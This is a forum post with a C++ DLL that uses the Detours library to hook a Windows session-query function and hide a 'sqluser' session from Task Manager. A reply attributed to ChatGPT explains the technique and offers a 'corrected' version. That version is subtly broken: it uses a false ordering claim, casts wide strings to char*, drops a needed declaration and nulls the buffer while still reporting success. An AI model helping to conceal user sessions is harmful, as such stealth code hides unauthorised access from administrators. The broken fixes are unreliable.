出处:http://blog.sina.com.cn/s/blog_717e88030100xrj1.html
// dllmain.cpp
#include "stdafx.h"
extern "C" _declspec(dllexport) bool HideUserSession(TCHAR* wcsUserName, int iLen);
TCHAR gUserName[128];
int gLen;
static BOOL (WINAPI* TrueWTSQuerySessionInformation)(
__in HANDLE hServer,
__in DWORD SessionId,
__in WTS_INFO_CLASS WTSInfoClass,
__out LPTSTR ppBuffer,
__out DWORD *pBytesReturned
) = WTSQuerySessionInformation;
BOOL WINAPI HookWTSQuerySessionInformation(
__in HANDLE hServer,
__in DWORD SessionId,
__in WTS_INFO_CLASS WTSInfoClass,
__out LPTSTR *ppBuffer,
__out DWORD *pBytesReturned
){
TrueWTSQuerySessionInformation(hServer, SessionId, WTSInfoClass, ppBuffer, pBytesReturned);
if(strncmp((char)*ppBuffer, (char*)gUserName, gLen) == 0){
return false;
}
return true;
}
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
ZeroMemory(gUserName, 128 * 2);
HideUserSession(L"sqluser", sizeof(L"sqluser"));
break;
}
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
//DetourTransactionBegin();
//DetourUpdateThread(GetCurrentThread());
//DetourDetach(&(PVOID&)TrueWTSQuerySessionInformation, HookWTSQuerySessionInformation);
//DetourTransactionCommit();
break;
}
return TRUE;
}
extern "C" _declspec(dllexport) bool HideUserSession(TCHAR* wcsUserName, int iLen){
CopyMemory(gUserName, wcsUserName, iLen);
gLen = iLen;
DetourRestoreAfterWith();
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourAttach(&(PVOID&)TrueWTSQuerySessionInformation, HookWTSQuerySessionInformation);
LONG error = DetourTransactionCommit();
if (error == NO_ERROR) {
//::MessageBox(NULL, L"load detours success!", L"tips", 0);
return true;
}
else {
//::MessageBox(NULL, L"load detours failed!", L"tips", 0);
return false;
}
}
无意发现,觉得有点意思,但是以上源码本人编译不通过,在下菜鸟学者,求助高手!
该回答引用ChatGPT
这段代码中包含了Detours库的使用,用于在运行时hook WTSQuerySessionInformation函数,从而实现在任务管理器中隐藏指定用户会话。
首先需要确保Detours库已经被正确地链接到项目中,并包含头文件"dllmain.h"和"detours.h"。由于代码中使用了Detours库的函数,如果没有链接或者包含这些头文件,编译时会报错。
其次,需要注意代码中的一些错误和不足。例如,在HookWTSQuerySessionInformation函数中,对于ppBuffer指针所指向的字符串进行比较时,应该使用strcmp函数而不是strncmp函数;另外,DetourRestoreAfterWith函数应该在DetourTransactionBegin函数之前调用。
下面是修改后的代码:
// dllmain.cpp
#include "stdafx.h"
#include "detours.h"
#pragma comment(lib, "detours.lib")
static TCHAR gUserName[128];
static int gLen;
static BOOL(WINAPI* TrueWTSQuerySessionInformation)(
__in HANDLE hServer,
__in DWORD SessionId,
__in WTS_INFO_CLASS WTSInfoClass,
__out LPTSTR * ppBuffer,
__out DWORD * pBytesReturned
) = WTSQuerySessionInformation;
BOOL WINAPI HookWTSQuerySessionInformation(
__in HANDLE hServer,
__in DWORD SessionId,
__in WTS_INFO_CLASS WTSInfoClass,
__out LPTSTR * ppBuffer,
__out DWORD * pBytesReturned
)
{
TrueWTSQuerySessionInformation(hServer, SessionId, WTSInfoClass, ppBuffer, pBytesReturned);
if (strcmp((char*)*ppBuffer, (char*)gUserName) == 0) {
*ppBuffer = NULL;
*pBytesReturned = 0;
}
return TRUE;
}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
ZeroMemory(gUserName, 128 * 2);
HideUserSession(L"sqluser", sizeof(L"sqluser"));
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
extern "C" _declspec(dllexport) bool HideUserSession(TCHAR* wcsUserName, int iLen)
{
CopyMemory(gUserName, wcsUserName, iLen);
gLen = iLen;
DetourRestoreAfterWith();
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourAttach(&(PVOID&)TrueWTSQuerySessionInformation, HookWTSQuerySessionInformation);
LONG error = DetourTransactionCommit();
if (error == NO_ERROR) {
return true;
}
else {
return false;
}
}
在代码中,我们使用了DetourAttach函数将HookWTSQuerySessionInformation函数与TrueWTSQuerySessionInformation函数进行关联,从而在调用TrueWTSQuerySessionInformation函数之前先执行HookWTSQuerySessionInformation函数,可以在该函数中实现对用户会话的隐藏。